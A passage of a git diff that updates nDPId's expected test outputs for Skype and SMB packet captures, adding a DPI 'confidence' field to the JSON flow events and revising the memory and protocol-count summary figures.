-00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.141","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.174","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970679995,"flow_last_seen":1431970679995,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970669927,"flow_last_seen":1431970669927,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.160","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.156","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00169{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","total-events-serialized":1293}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970681960,"flow_last_seen":1431970681960,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.144","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970662914,"flow_last_seen":1431970662914,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.172","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.173","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.141","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.174","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970679995,"flow_last_seen":1431970679995,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970669927,"flow_last_seen":1431970669927,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.160","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.156","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00169{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","total-events-serialized":1292}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 2146/2079
 ~~ skipped flows.............: 0
 ~~ total layer4 data length..: 359672 bytes
-~~ total detected protocols..: 196
+~~ total detected protocols..: 195
 ~~ total active/idle flows...: 267/267
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 5210326 bytes
-~~ total memory freed........: 5210326 bytes
-~~ total allocations/frees...: 102555/102555
+~~ total memory allocated....: 5208307 bytes
+~~ total memory freed........: 5208307 bytes
+~~ total allocations/frees...: 104146/104146
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 174 chars
 ~~ json string max len.......: 1769 chars
diff --git a/test/results/skype_udp.pcap.out b/test/results/skype_udp.pcap.out
index 288e3bb79..095cf2ab4 100644
--- a/test/results/skype_udp.pcap.out
+++ b/test/results/skype_udp.pcap.out
@@ -2,9 +2,9 @@
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"skype_udp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1156534494734,"flow_last_seen":1156534494734,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1156534494734,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"24.224.190.149","src_port":35990,"dst_port":39262,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"skype_udp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1156534494734,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"ts_msec":1156534494734,"pkt":"ABbjGScVAAR2lnvaCABFAAA7AABAAEARoZLAqAECGOC+lYyWmV4AJ5lYFpcCrtEAh3kuASsbNLlPtKfPLsSj70vZ59IfZD23vQ=="}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"skype_udp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1156534496782,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"ts_msec":1156534496782,"pkt":"ABbjGScVAAR2lnvaCABFAAA7AABAAEARoZLAqAECGOC+lYyWmV4AJ5lYFpcCqvCj5HkuAStybQoRs8uOXAH\/9ayvdzDWsfxVrg=="}
-00594{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"skype_udp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1156534494734,"flow_last_seen":1156534496782,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1156534496782,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"24.224.190.149","src_port":35990,"dst_port":39262,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable"}}
+00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"skype_udp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1156534494734,"flow_last_seen":1156534496782,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1156534496782,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"24.224.190.149","src_port":35990,"dst_port":39262,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams","breed":"Acceptable"}}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"skype_udp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1156534500825,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"ts_msec":1156534500825,"pkt":"ABbjGScVAAR2lnvaCABFAAA7AABAAEARoZLAqAECGOC+lYyWmV4AJ5lYFpcCvuoUBXkuASuSYOIkRaPfGbxEfOnC\/51D4o9Ncw=="}
-00634{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"skype_udp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1156534494734,"flow_last_seen":1156534567244,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1156534567244,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"24.224.190.149","src_port":35990,"dst_port":39262,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams","breed":"Acceptable"}}
+00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"skype_udp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1156534494734,"flow_last_seen":1156534567244,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1156534567244,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"24.224.190.149","src_port":35990,"dst_port":39262,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams","breed":"Acceptable"}}
 00156{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":5,"source":"skype_udp.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 5/5
@@ -14,10 +14,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4594974 bytes
-~~ total memory freed........: 4594974 bytes
-~~ total allocations/frees...: 99558/99558
+~~ total memory allocated....: 4679927 bytes
+~~ total memory freed........: 4679927 bytes
+~~ total allocations/frees...: 101148/101148
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 161 chars
-~~ json string max len.......: 639 chars
-~~ json string avg len.......: 463 chars
+~~ json string max len.......: 665 chars
+~~ json string avg len.......: 475 chars
diff --git a/test/results/smb_deletefile.pcap.out b/test/results/smb_deletefile.pcap.out
index a58ed0a5f..4187e1d9c 100644
--- a/test/results/smb_deletefile.pcap.out
+++ b/test/results/smb_deletefile.pcap.out
@@ -1,10 +1,10 @@
 00446{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"smb_deletefile.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1584368315417,"flow_last_seen":1584368315417,"flow_idle_time":7440000,"flow_min_l4_payload_len":380,"flow_max_l4_payload_len":380,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":380,"midstream":1,"ts_msec":1584368315417,"l3_proto":"ip4","src_ip":"192.168.1.118","dst_ip":"192.168.1.187","src_port":56848,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 01007{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1584368315417,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":434,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":434,"pkt_l4_len":400,"ts_msec":1584368315417,"pkt":"2MuK4S0uKDc3AG3ICABFAAGkAABAAEAGtNLAqAF2wKgBu94QAb3ooAVq8kMyI1AYqgDfmAAAAAABeP5TTUJAAAEAAAAAAAUAAAEAAAAAmAAAAJwPAAAAAAAA\/\/4AABEAAAAdAAAAACgAAAAAAAAAAAAAAAAAAAAAAAA5AAAAAgAAAAAAAAAAAAAAAAAAAAAAAACBABAAEAAAAAcAAAABAAAAAQAAAHgAHAAAAAAAAAAAAEwAdQBjAGEAXABEAG8AdwBuAGwAbwBhAGQAcwAAAAAA\/lNNQkAAAQAAAAAADgAAAQQAAACIAAAAnQ8AAAAAAAD\/\/gAAEQAAAB0AAAAAKAAAAAAAAAAAAAAAAAAAAAAAACEAJQMAAAAA\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/2AAJgAAAAEAaQBuAG4AbwBzAGUAdAB1AHAALQA1AC4ANgAuADEALgBlAHgAZQAAAP5TTUJAAAEAAAAAAAYAAAEEAAAAAAAAAJ4PAAAAAAAA\/\/4AABEAAAAdAAAAACgAAAAAAAAAAAAAAAAAAAAAAAAYAAAAAAAAAP\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8="}
-00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1584368315417,"flow_last_seen":1584368315417,"flow_idle_time":7440000,"flow_min_l4_payload_len":380,"flow_max_l4_payload_len":380,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":380,"midstream":1,"ts_msec":1584368315417,"l3_proto":"ip4","src_ip":"192.168.1.118","dst_ip":"192.168.1.187","src_port":56848,"dst_port":445,"l4_proto":"tcp","ndpi": {"proto":"NetBIOS.SMBv23","breed":"Acceptable","category":"System"}}
+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1584368315417,"flow_last_seen":1584368315417,"flow_idle_time":7440000,"flow_min_l4_payload_len":380,"flow_max_l4_payload_len":380,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":380,"midstream":1,"ts_msec":1584368315417,"l3_proto":"ip4","src_ip":"192.168.1.118","dst_ip":"192.168.1.187","src_port":56848,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv23","breed":"Acceptable","category":"System"}}
